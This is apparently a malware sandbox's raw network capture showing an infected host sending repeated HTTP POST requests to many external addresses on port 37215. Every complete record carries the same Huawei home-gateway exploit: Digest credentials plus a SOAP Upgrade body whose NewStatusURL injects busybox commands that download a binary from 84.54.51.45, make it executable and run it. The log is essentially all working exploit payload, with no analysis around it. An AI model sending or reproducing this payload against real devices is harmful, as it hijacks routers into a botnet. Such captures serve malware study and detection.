                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1483192.168.2.154422441.241.216.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107346058 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1484192.168.2.155988841.12.138.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107357025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1485192.168.2.155583641.66.152.11437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107361078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1486192.168.2.155434441.63.249.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107419968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1487192.168.2.155237441.223.133.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107431889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1488192.168.2.153464441.114.95.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107433081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1489192.168.2.153564241.92.73.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107435942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1490192.168.2.154490441.94.48.13737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107436895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1491192.168.2.154221241.105.205.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107451916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1492192.168.2.154827441.83.236.17837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107489109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
